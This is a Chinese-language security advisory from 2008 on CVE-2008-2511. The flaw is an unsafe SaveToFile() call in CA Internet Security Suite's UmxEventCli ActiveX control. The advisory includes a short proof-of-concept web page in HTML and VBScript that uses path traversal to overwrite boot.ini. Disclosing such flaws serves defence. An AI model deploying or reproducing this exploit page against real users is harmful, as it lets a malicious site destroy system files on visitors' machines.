发布日期：2008-05-29
更新日期：2008-05-30

受影响系统：

Computer Associates Internet Security Suite 2008

描述：

---

CVE(CAN) ID: CVE-2008-2511

CA Internet Security Suite是为家庭用户提供的综合网络安全解决方案。

Internet Security Suite所提供的UmxEventCli.CachedAuditDataList.1 ActiveX控件（UmxEventCli.dll）没有安全地调用SaveToFile()函数，如果用户受骗访问了恶意网页的话，就可能以当前登录用户的权限覆盖并破坏系统上的任意文件。

<*来源：Paul Kurczaba （pkurczaba@att.net）
  
  链接：http://secunia.com/advisories/30420/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><object classid='clsid:F13D3742-6C4F-4915-BF91-784BA02DD0BE' id='UmxEventCliLib'/>
</object><script language='vbscript'>
filePath="..\..\..\..\..\..\..\boot.ini"
UmxEventCliLib.SaveToFile filePath
</script></html>

建议：

---

厂商补丁：

Computer Associates
-------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cai.com/

浏览次数：2502
严重程度：0（网友投票）